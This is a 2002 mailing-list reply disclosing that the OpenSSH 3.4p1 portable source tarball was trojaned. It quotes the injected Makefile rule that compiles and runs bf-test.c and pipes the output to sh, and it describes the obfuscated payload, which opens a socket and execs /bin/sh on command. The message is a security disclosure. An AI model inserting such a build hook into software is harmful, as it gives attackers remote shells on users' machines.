Re: [fw-wiz] OpenSSH 3.4p1 possibly trojaned

Date: 08/01/02

To: "Paul D. Robertson" <>
Date: Thu Aug  1 10:01:00 2002

| It would appear that the OpenSSH code for all the non-OpenBSD systems was
| trojaned at some point pretty recently.

| all: libopenbsd-compat.a
| + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
| ./bf-test.out &
| Trojan connection:
| (

More details:

The source file (bf-test.c) contains a header with some spelling
mistakes, and then blocks of binary data. When run, the binary block is
deobfuscated and written to to a shell script in the current directory
and then run from the Makefile.

The generated script contains some C code, which is compiled and then

It's forking, connecting to, and reading commands
from the socket, A, D or M. (D execs /bin/sh connected to the socket, A
exits, and M seems to make the process sleep for a while.)


Henning Spjelkavik

Skiinfo AS
Christian Krohgsgate 60     Fax:        22114011
0186 Oslo                   Foretaksnr: 976036859      E-mail: